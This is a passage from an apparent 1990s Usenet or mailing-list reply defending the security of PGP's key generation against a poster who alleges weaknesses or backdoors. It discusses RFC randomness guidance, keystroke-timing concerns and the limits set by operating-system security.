say that? In what way does it not do this? The RFC states, in your quote, that "existing hardware on many systems can be used" for truly random hardware techniques. Please, substantiate your claim that PGP does not do this. Show me code segments which show it does not. Show me an analysis that goes contrary to the RFC. > But the RFC acknowledges that these methods are highly suspect and should > not be trusted. You're right, it should not be blindly trusted. Go read the code and examine the algorithms to prove to yourself that it is secure. I've done that to the extent that I wish, and I believe it is secure. But you wont take my word for it, so go ahead and check! Oh, wait, you wont do that either. Sorry. I forgot. > How is it "unscholarly, unprofessional, needlessly personal, and just > plain insulting" to question the idea that hundreds of thousands of > people are trusting their freedom to software that is probably not > secure? I think it is highly unprofessional to try to claim that PGP is > secure and to try to bolster that position by claiming that some > "Request for Comments" supports it when that same said RFC refutes it. Show me some proof that PGP is "probably not secure"? Come on, there is a finite probability that I can walk through a wall! The laws of quantum probablility give me this finite probability! But I'd be hard pressed to show you that I can walk through the wall. It looks good on paper, but it just ain't gonna happen. As for the RFC, it does not refute that PGP is secure. In fact, PGP pretty much follows the RFCs guidelines. You clearly have selective reading. A useful skill -- I should learn it. > It has been my general impression that "scholarly" means, among other > things, questioning the status quo and finding out where the generally > accepted ideas break down. I am a professional in the field of > information protection, and I consider it highly unprofessional in this > field to assume that systems are secure without ample evidence to > support it. Dont forget that you have to run PGP in some OS. Please show me a secure OS! Given that the OS cannot be secure (using your logic it is intuitively obvious that this is true) then how can you ask to see a program any more secure than the enviornment in which it runs? PGP tries to be as secure as possible given the environment in which it is being run. > So far, I see no ample evidence to support the security of PGP's key > generation algorithm relative to the concerns I have expressed. Those > concerns are fairly specific as far as I am concerned, but if you feel I > have to demonstrate a specific attack that works in order to question > the adequacy of protection, I think you have it backwards. No, your concerns have been utterly vague. The closest you've come to being at all specific is some vague notion of analyzing keystrokes. In every message I've responded to, I've asked you to expand upon what you mean. What kind of analysis do you mean? How do you propose to analyze keystroke timings? Even if you have a probabalistic model of keystroke timings, all you can possibly do is compare two different probabilities to see if they are the same. But that doesn't help you limit the search on keys. > If the people at MIT feel personally insulted because I have questioned > their previously accepted ideas, it's just too bad. I didn't say they I'm not insulted that you are questioning PGP. I am insulted because in every message you have sent, you have postulated some conspiracy with the government or postulated some intentional weakening of PGP. Your statements could almost be construed as libelous, which is why I feel insulted. I feel extremely comfortable with people questioning the security of PGP. What I dont like is someone stating that it is not secure, slaiming some sort of back door (which connotes some intent to reduce the security) and does not back up the claim with any proof. > In my case, I question its security and have given at least one > example of how it could be insecure. And I've asked to you explain your conjecture, which you have constantly either refused to do or intentionally ignored. > If you do believe it is secure, you should be able to support > your contention with more than reference to RFCs, vague > comments, and claiming that you have read the code and didn't > catch anything. No matter what, PGP's security is based upon the security of RSA, which in turn is based upon the difficult of factoring, which has never been proven to be hard. Therefore, there is always the possibility that someone will find a polynomial factoring algorithm which would completely destroy any security in PGP. > If you cannot specifically address my question, say so, tell us > all that the security of PGP is an open question, and either > leave it open or go after closing it. Ok. Please explain what kind of keystroke timing analysis you propose, and I will attempt to answer that, or concede your point. > OR come up with another alternative that doesn't ignore my question, > doesn't avoid the issue, doesn't appeal to authority that fails to > adequately support your contentions, and doesn't claim that I an > somehow unprofessional or scholarly for questioning an unproven > contention. Have you heard the thought experiment of putting a back-door in login by modifying the C compiler to modilgy the C compiler to modify login? Think about that in terms of the security of PGP -- you are always going to be limited in security to the security of the system on which you are running. I only believe you are being unscholarly because you are making claims without any supporting evidence. _THAT_ is unscholarly! Now, if you are asking if PGP is completely bug free, I will be the first to admit that it is not. I am certain that there are latent bugs in the code (and there are many that have been fixed since the 2.6.2 release). However that has not been your statement nor your questions. You have asked about back doors, an intentional act to reduce the security, and to that I vehemently say that there are none. How do I know that you haven't been infected by a computer virus? Perhaps there was a computer virus that flashed subliminal messages on your screen to make you think you were L. Detweiler and think that Desert Storm was the greatest thing since sliced bread? Improbable? Perhaps, but prove to me that this didn't happen! How do you know that Microsoft Windows doesn't send all your keystrokes to Bill Gates for him to peruse? Prove to me that we landed on the moon! Some have contended that it was all a hoax. Prove to me that the universe existed before I was concious of it. How do I know that you exist? Perhaps all this is a dream -- and if so, I sure hope to god I wake up soon. Good night. -derek